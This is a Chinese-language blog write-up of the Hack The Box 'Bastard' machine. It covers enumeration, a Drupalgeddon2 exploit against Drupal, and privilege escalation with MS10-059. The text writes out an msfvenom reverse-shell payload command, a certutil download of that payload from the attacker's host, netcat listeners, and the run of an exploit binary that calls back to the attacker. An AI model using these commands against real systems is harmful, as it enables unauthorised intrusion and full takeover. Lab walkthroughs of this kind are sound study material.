Bastard MS10-059

05612

简介

Backdoor

Difficulty Medium

 

实验环境

攻击者 Kali 10.10.16.7

受害者 IP 10.10.10.9  Linux

 

1. 信息收集

收集受害者服务详情

nmap -sV -A 10.10.10.9

80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC

 

访问80端口

2024-05-16_21-01

 

首先droopscan

droopescan scan drupal -u http://10.10.10.9/

发现目标的版本是7.5.4

2024-05-16_21-03

mv 44449.rb drupalgeddon2.rb
ruby drupalgeddon2.rb http://10.10.10.9/

能拿到一个不完整的shell

2024-05-16_21-07

 

2. 权限提升

从kali上下载reverse的payload

Kali上

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.7 LPORT=443 -f exe>manual.exe
python3 -m http.server 4444

windows下载

certutil.exe -urlcache -f http://10.10.16.7:4444/manual.exe rc.exe

Kali监听443

nc -lvp 443

windows运行反弹shell

rc.exe

能拿到完整shell

2024-05-16_21-10

 

systeminfo

保存到本地的wininfo.txt 然后使用windows-exploit-suggester

/root/anaconda3/envs/python2/bin/python2 windows-exploit-suggester.py --update
/root/anaconda3/envs/python2/bin/python2 windows-exploit-suggester.py --database 2024-05-16-mssb.xlsx --systeminfo /tmp/wininfo.txt

2024-05-16_21-11

2024-05-16_21-12_1

我们可以尝试MS10-059

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

 

kali下载 然后windows下载

kali监听 4444端口

windows运行

MS10-059.exe 10.10.16.7 4444

2024-05-16_21-14

权限提升成功

 

 

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Hack The Box
喜欢就支持一下吧
点赞12 分享
zhyann的头像-白鸢的笔记钻石会员
Active Directory Introduction and Enumeration 2-白鸢的笔记
Active Directory Introduction and Enumeration 2
Active Directory Introduction and Enumeration 2
1年前 182
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
使用自动化脚本实现Linux信息收集工作-白鸢的笔记
使用自动化脚本实现Linux信息收集工作
使用自动化脚本实现Linux信息收集工作
2年前 138
NTLM认证-白鸢的笔记
NTLM认证
NTLM认证
11个月前 133
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
判断语句的嵌套-白鸢的笔记
判断语句的嵌套
判断语句的嵌套
2年前 118
相关推荐
Forest rpc用户枚举 AS-REP Roasting 域内权限提升-白鸢的笔记
Forest rpc用户枚举 AS-REP Roasting 域内权限提升
Forest rpc用户枚举 AS-REP Roasting 域内权限提升
10个月前 96
Arctic Juicy Potato提权-白鸢的笔记
Arctic Juicy Potato提权
Arctic Juicy Potato提权
10个月前 93
Sunday 79端口finger服务用户枚举-白鸢的笔记
Sunday 79端口finger服务用户枚举
Sunday 79端口finger服务用户枚举
10个月前 91
SwagShop Magento漏洞挖掘利用-白鸢的笔记
SwagShop Magento漏洞挖掘利用
SwagShop Magento漏洞挖掘利用
10个月前 83
Jerry Tomcat密码爆破和.war木马利用-白鸢的笔记
Jerry Tomcat密码爆破和.war木马利用
Jerry Tomcat密码爆破和.war木马利用
10个月前 83
node1 mongodb反弹shell-白鸢的笔记
node1 mongodb反弹shell
node1 mongodb反弹shell
10个月前 82
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片